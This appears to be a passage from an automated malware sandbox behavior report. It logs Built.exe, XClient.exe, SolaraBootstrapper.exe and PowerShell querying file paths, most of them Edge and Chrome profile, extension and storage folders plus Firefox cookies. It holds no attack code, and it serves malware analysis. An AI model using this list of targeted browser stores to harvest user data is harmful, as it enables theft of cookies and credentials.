                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gu VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hi VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ko VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lo VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hi VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\OriginTrials VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\RecoveryImproved VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XClient.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
